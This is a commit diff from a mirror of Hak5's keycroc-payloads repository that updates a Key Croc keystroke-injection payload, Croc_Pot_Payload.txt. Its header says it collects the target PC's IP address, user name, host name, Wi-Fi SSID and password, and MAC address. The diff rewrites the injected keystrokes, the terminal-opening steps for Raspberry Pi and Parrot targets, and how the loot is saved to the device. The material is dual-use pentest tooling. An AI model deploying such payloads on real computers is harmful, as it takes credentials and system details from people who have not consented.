hak5
/
keycroc-payloads
mirror of https://github.com/hak5/keycroc-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #43 from spywill/patch-11 

Update Croc_Pot_Payload.txt
pull/44/head
Darren Kitchen 2022-05-27 09:09:37 -05:00 committed by GitHub
parent 58938cfd87 9ef4d3f8da
commit 75dc02d676
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 14 additions and 43 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

57
payloads/library/general/Croc_Pot/Croc_Pot_Payload.txt
View File

@ -3,7 +3,7 @@
# This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address) # This will collect some data off target PC (ip address, current user name, pc host name, ssid and passwd, mac address)
# save to tools/Croc_pot folder # save to tools/Croc_pot folder
# Author: Spywill # Author: Spywill
# Version: 1.3.6 # Version: 1.3.8
# Category: Key Croc # Category: Key Croc
MATCH crocpot MATCH crocpot
@ -32,7 +32,6 @@ fi
#---> Payload variable/remove existing OS detection #---> Payload variable/remove existing OS detection
CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt CROC_OS=/root/udisk/tools/Croc_Pot/Croc_OS.txt
cat > ${CROC_OS}
rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt rm /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt
#---> Enter ethernet mode for OS detection #---> Enter ethernet mode for OS detection
@ -40,10 +39,10 @@ ATTACKMODE AUTO_ETHERNET
LED ATTACK LED ATTACK
#---> Keycroc built in functions to retrieve target PC Loot #---> Keycroc built in functions to retrieve target PC Loot
GET TARGET_OS #---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
GET TARGET_IP GET TARGET_OS && echo "$TARGET_OS" | tee ${CROC_OS}
GET HOST_IP GET TARGET_IP && echo "$TARGET_IP" | tee -a ${CROC_OS}
GET TARGET_HOSTNAME GET TARGET_HOSTNAME && echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
#---> After OS detection case TARGET_OS value #---> After OS detection case TARGET_OS value
case $TARGET_OS in case $TARGET_OS in
@ -127,15 +126,13 @@ WINDOWS)
Q STRING "${CROC_PW}" Q STRING "${CROC_PW}"
Q ENTER Q ENTER
sleep 2 sleep 2
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt #---> sed to remove powershell output "\r" endlines
echo "$TARGET_OS" >> ${CROC_OS}
echo "$TARGET_IP" >> ${CROC_OS}
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
echo "$HOST_IP" >> ${CROC_OS}
#---> Edit with sed to remove powershell output "r" endlines & sed return only readable character & replace "-" with ":"
$(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) $(sed -i 's/\r//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> sed to return only readable character
$(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) $(sed -i $'s/[^[:print:]\t]//g' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> sed to remove powershell output first "?" character
$(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt) $(sed -i '0,/./s/^.//' /root/udisk/tools/Croc_Pot/Croc_OS_Target.txt /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt)
#---> sed to replace "-" with ":"
$(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt) $(sed -i 's/-/:/g' /root/udisk/tools/Croc_Pot/shark_ip.txt /root/udisk/tools/Croc_Pot/squirrel_mac.txt /root/udisk/tools/Croc_Pot/turtle_mac.txt /root/udisk/tools/Croc_Pot/bunny_mac.txt)
#---> Starting Croc_Pot #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
@ -159,11 +156,6 @@ MACOS)
Q STRING "${CROC_PW}" Q STRING "${CROC_PW}"
Q ENTER Q ENTER
sleep 1 sleep 1
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt
echo "$TARGET_OS" >> ${CROC_OS}
echo "$TARGET_IP" >> ${CROC_OS}
echo "$TARGET_HOSTNAME" >> ${CROC_OS}
echo "$HOST_IP" >> ${CROC_OS}
#---> Starting Croc_Pot #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;; Q ENTER ;;
@ -175,18 +167,9 @@ LINUX)
#---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value #---> After TARGET_HOSTNAME scan case TARGET_HOSTNAME value
case $TARGET_HOSTNAME in case $TARGET_HOSTNAME in
raspberrypi) raspberrypi)
#---> Copy LXTerminal to desktop
Q GUI d
Q CONTROL-ALT-F1
sleep 1
Q STRING "cp -u /usr/share/applications/lxterminal.* /home/\$(whoami)/Desktop"
Q ENTER
Q ALT-F7
#---> Start Raspberry pi 4 LXTerminal #---> Start Raspberry pi 4 LXTerminal
sleep 1 Q CONTROL-ALT-d
Q STRING "LXTerminal" Q CONTROL-ALT-t
Q ENTER
Q ENTER
sleep 2 sleep 2
#---> Place keycroc usb drive into variable #---> Place keycroc usb drive into variable
Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt" Q STRING "PC_USER=/media/\$(whoami)/KeyCroc/tools/Croc_Pot/Croc_OS_Target.txt"
@ -242,11 +225,7 @@ raspberrypi)
#---> Entering keycroc passwd #---> Entering keycroc passwd
Q STRING "${CROC_PW}" Q STRING "${CROC_PW}"
Q ENTER Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt sleep 1
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;; Q ENTER ;;
@ -326,11 +305,7 @@ parrot)
#---> Entering keycroc passwd #---> Entering keycroc passwd
Q STRING "${CROC_PW}" Q STRING "${CROC_PW}"
Q ENTER Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt sleep 1
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;; Q ENTER ;;
@ -411,11 +386,7 @@ parrot)
#---> Entering keycroc passwd #---> Entering keycroc passwd
Q STRING "${CROC_PW}" Q STRING "${CROC_PW}"
Q ENTER Q ENTER
#---> Save Keycroc built in functions to tools/Croc_Pot/Croc_OS.txt sleep 1
echo "$TARGET_OS" | tee -a ${CROC_OS}
echo "$TARGET_IP" | tee -a ${CROC_OS}
echo "$TARGET_HOSTNAME" | tee -a ${CROC_OS}
echo "$HOST_IP" | tee -a ${CROC_OS}
#---> Starting Croc_Pot #---> Starting Croc_Pot
Q STRING "/root/udisk/tools/Croc_Pot.sh" Q STRING "/root/udisk/tools/Croc_Pot.sh"
Q ENTER ;; Q ENTER ;;